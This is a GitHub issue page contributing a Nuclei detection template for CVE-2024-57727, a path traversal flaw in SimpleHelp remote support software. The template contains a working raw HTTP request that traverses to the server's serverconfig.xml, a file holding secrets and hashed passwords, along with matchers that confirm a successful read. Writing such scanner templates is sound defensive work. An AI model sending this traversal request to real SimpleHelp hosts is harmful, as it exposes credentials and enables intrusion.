Skip to content

Create CVE-2024-57727 #11504

New issue
New issue
Closed
#11507
Closed
Create CVE-2024-57727#11504
#11507
Assignees
DhiyaneshGeek
Labels
DoneReady to mergetemplate-contributionNuclei template contribution
@3th1cyuk1

Description

@3th1cyuk1
3th1cyuk1
opened on Jan 18, 2025

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

id: CVE-2024-57727

info:
  name: SimpleHelp Path Traversal Vulnerability
  author: 3th1c_yuk1
  severity: high
  description: |
    SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57727
    - https://github.com/imjdl/CVE-2024-57727
    - https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier
    - https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/
    
http:
  - raw:
      - |
        GET /toolbox-resource/../resource1/../../configuration/serverconfig.xml HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "SimpleHelp Server XML Configuration File"
        condition: and

Relevant dumped responses



Anything else?


No response
Metadata
Metadata
Assignees
Labels
DoneReady to mergetemplate-contributionNuclei template contribution
Type
No type
Projects
No projects
Milestone
No milestone
Relationships
None yet
Development
No branches or pull requests
Issue actions